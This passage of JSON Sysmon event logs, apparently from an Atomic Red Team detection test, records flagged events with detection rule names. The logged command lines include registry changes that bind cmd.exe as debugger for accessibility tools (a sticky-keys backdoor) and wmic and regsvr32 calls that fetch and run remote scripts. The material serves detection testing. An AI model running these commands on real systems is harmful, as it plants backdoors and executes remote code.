14:49:52.011"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3725,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:49:52.048002Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D89A-5D31-0000-0010F56D3200","ProcessId":3704,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger","UtcTime":"2019-07-19 14:50:02.212"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3731,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:50:02.220426Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D89F-5D31-0000-0010BD7F3200","ProcessId":1860,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger","UtcTime":"2019-07-19 14:50:07.307"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3735,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:50:07.322063Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8A2-5D31-0000-0010D5913200","ProcessId":2272,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger","UtcTime":"2019-07-19 14:50:10.275"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3739,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:50:10.295724Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8A5-5D31-0000-0010C39D3200","ProcessId":5000,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\magnify.exe\\Debugger","UtcTime":"2019-07-19 14:50:13.137"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3743,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:50:13.153167Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8A6-5D31-0000-0010A5A93200","ProcessId":5972,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\narrator.exe\\Debugger","UtcTime":"2019-07-19 14:50:14.697"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3747,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:50:14.716040Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","Sticky Key Like Backdoor Usage"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8A9-5D31-0000-0010C0C63200","ProcessId":5124,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger","UtcTime":"2019-07-19 14:50:17.979"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3751,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:50:17.990891Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D8AB-5D31-0000-0010A5D23200","ProcessId":5632,"RuleName":"Persistence - IFEO Debugger ValueSet","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger","UtcTime":"2019-07-19 14:50:19.495"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3755,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:50:19.516948Z"}},"Version":2}}}},{"detection":["XSL Script Processing"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"wmic.exe process /FORMAT:list","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"WMI Commandline Utility","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic.exe process /FORMAT:list\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D8CF-5D31-0000-00109B603300","ParentProcessId":5380,"ProcessGuid":"747F3D96-D8D0-5D31-0000-0010F3623300","ProcessId":7040,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:50:56.021"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3763,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:50:56.047770Z"}},"Version":5}}}},{"detection":["XSL Script Processing","SquiblyTwo"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"WMI Commandline Utility","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D8DA-5D31-0000-0010D3833300","ParentProcessId":5340,"ProcessGuid":"747F3D96-D8DA-5D31-0000-001029863300","ProcessId":3220,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:51:06.748"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3766,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:51:06.753240Z"}},"Version":5}}}},{"detection":["Net.exe Execution","Windows Network Enumeration"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"net view /domain","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Net Command","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07","Image":"C:\\Windows\\System32\\net.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"net view /domain\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D8DD-5D31-0000-0010EF923300","ParentProcessId":4856,"ProcessGuid":"747F3D96-D8DD-5D31-0000-001043953300","ProcessId":3012,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:51:09.839"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3769,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:51:09.845415Z"}},"Version":5}}}},{"detection":["Net.exe Execution","Windows Network Enumeration"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"net view","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Net Command","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07","Image":"C:\\Windows\\System32\\net.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"net view\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D8EA-5D31-0000-001030B63300","ParentProcessId":1988,"ProcessGuid":"747F3D96-D8EA-5D31-0000-00108AB83300","ProcessId":4684,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:51:22.330"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3771,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:51:22.333688Z"}},"Version":5}}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"regsvr32.exe /s /u /i:C:\\AtomicRedTeam\\atomics\\T1117\\RegSvr32.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"regsvr32.exe /s /u /i:C:\\AtomicRedTeam\\atomics\\T1117\\RegSvr32.sct scrobj.dll\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D976-5D31-0000-001041E83700","ParentProcessId":4444,"ProcessGuid":"747F3D96-D976-5D31-0000-001093EA3700","ProcessId":2332,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:42.834"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4033,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:53:42.841951Z"}},"Version":5}}}},{"detection":["Regsvr32 Network Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"Microsoft Corporation","Description":"Windows ® Script Component Runtime","FileVersion":"5.812.10240.16384","Hashes":"SHA1=5B139E692D2A376CCA16D536612EF87AD946EC6B,MD5=3F4DB17E9534DB1CEDA28FF77C27F535,SHA256=14A2C790E3E82DAF7918B61AB79F84228E7CA4494F5C2D311A1179CCA67B02C2,IMPHASH=C928D4D30D6B6FC0A3B011AA381044CA","Image":"C:\\Windows\\System32\\regsvr32.exe","ImageLoaded":"C:\\Windows\\System32\\scrobj.dll","ProcessGuid":"747F3D96-D976-5D31-0000-001093EA3700","ProcessId":2332,"Product":"Microsoft ® Windows ® Script Component Runtime","RuleName":"","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-07-19 14:53:42.961"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":4034,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:53:42.964349Z"}},"Version":3}}}},{"detection":["Regsvr32 Command Line Without DLL"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\calc.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"regsvr32.exe /s /u /i:C:\\AtomicRedTeam\\atomics\\T1117\\RegSvr32.sct scrobj.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"747F3D96-D976-5D31-0000-001093EA3700","ParentProcessId":2332,"ProcessGuid":"747F3D96-D977-5D31-0000-00100A0E3800","ProcessId":3848,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:43.339"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4035,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:53:43.445040Z"}},"Version":5}}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D978-5D31-0000-0010442F3800","ParentProcessId":2832,"ProcessGuid":"747F3D96-D978-5D31-0000-0010EB313800","ProcessId":2076,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:44.049"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4038,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:53:44.054072Z"}},"Version":5}}}},{"detection":["Regsvr32 Network Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"Microsoft Corporation","Description":"Windows ® Script Component Runtime","FileVersion":"5.812.10240.16384","Hashes":"SHA1=5B139E692D2A376CCA16D536612EF87AD946EC6B,MD5=3F4DB17E9534DB1CEDA28FF77C27F535,SHA256=14A2C790E3E82DAF7918B61AB79F84228E7CA4494F5C2D311A1179CCA67B02C2,IMPHASH=C928D4D30D6B6FC0A3B011AA381044CA","Image":"C:\\Windows\\System32\\regsvr32.exe","ImageLoaded":"C:\\Windows\\System32\\scrobj.dll","ProcessGuid":"747F3D96-D978-5D31-0000-0010EB313800","ProcessId":2076,"Product":"Microsoft ® Windows ® Script Component Runtime","RuleName":"","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-07-19 14:53:44.103"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":4039,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:53:44.117123Z"}},"Version":3}}}},{"detection":["Regsvr32 Command Line Without DLL"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\calc.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"747F3D96-D978-5D31-0000-0010EB313800","ParentProcessId":2076,"ProcessGuid":"747F3D96-D97A-5D31-0000-00105DA83800","ProcessId":4336,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:46.135"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4041,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:53:46.204886Z"}},"Version":5}}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\syswow64\\regsvr32.exe\" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8","Image":"C:\\Windows\\SysWOW64\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D97A-5D31-0000-00109DDC3800","ProcessId":3564,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:46.831"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4044,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:53:46.848703Z"}},"Version":5}}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Network 